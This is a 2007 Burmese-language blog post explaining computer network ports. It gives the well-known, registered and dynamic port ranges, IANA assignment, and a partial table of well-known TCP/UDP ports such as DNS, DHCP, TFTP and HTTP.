DNS (Domain Name System)

Official

57/TCP

MTP, Mail Transfer Protocol


67/UDP

BOOTP (BootStrap Protocol) server; also used by DHCP (Dynamic Host Configuration Protocol)

Official

68/UDP

BOOTP client; also used by DHCP

Official

69/UDP

TFTP (Trivial File Transfer Protocol)

Official

70/TCP

Gopher protocol

Official

79/TCP

Finger protocol

Official

80/TCP

HTTP (HyperText Transfer Protocol) - used for transferring web pages

Official

May 27, 2007

Computer များရဲ့ဂယ်ပေါက်များ


ကျွန်တော်တို့Computer တွေမှာ ကျွန်တော်တို့မသိသေးတဲ့ ဂယ်ပေါက်တွေအများကြီးရှိနေပါတယ်.. အဲဒီနေရာတွေကနေ အကောင်တွေ (Virus, Trojan & Worm) တွေ ၀င်ဝင်ကိုက်တာပေါ့ ခင်ဗျာ...
အဲဒီဟာလေး တွေကို Port တွေလို့ ခေါ်ပါတယ်...

  • အပိုင်း ၃ ပိုင်းခွဲထားပါတယ်
  • Well known ports, Register ports, Dynamic or Private ports တို့ဖြစ်
  • Well known = port 0 to 1023
  • Registered = port 1024 to 49151
  • Dynamic and/or Private = ports 49152 to 65535
Well Known Port Numbers
Well knowns port များမှာ IANA ( Internet Assign Numbers Authority ) ကသတ်မှတ်ပေးထားသော port များဖြစ်သည်။ OS တွင်အသုံးပြုမည့် Program များ၊ user များ အသုံးပြုမည့် Program များတွင် အများဆုံး အသုံးပြုသည်။

TCP ( Transmission Control Protocol ) တွင်သုံးထားသော ports များမှာ အချိန်ကြာမြင့်စွာ ဆက်သွယ် ဆောင်ရွက်ရသည့် အလုပ်များအတွက် ဖြစ်သည်။
အတိအကျ မသိနိုင်သော ခေါ်ဆိုဆက်သွယ်မှုများအတွက် အလုပ်လုပ်ပေးနိုင်ရန် Service contact port တစ်ခုကို သတ်မှတ်ပေးရသည်။ Contact port ကိုပင် Well Known Port များဟု ခေါ်ကြသည်။
အောက်ပါစာရင်းတွင် Server မှ၎င်း၏ contact port များအဖြစ် လုပ်ငန်းဆောင်ရွက်ရာတွင် အသုံးပြုသောport များကို တွေ့ရမည်-

အလုပ်များတိုးချဲ့ဆောင်ရွက်နိုင်ရန်အတွက် TCP port များကို UDP တွင်လည်းအတူတူပင်သုံးသည်
IANA မှ စီမံသတ်မှတ်ပေးထားသော Assign ports များမှာ 0 မှ 1023 အထိဖြစ်သည် -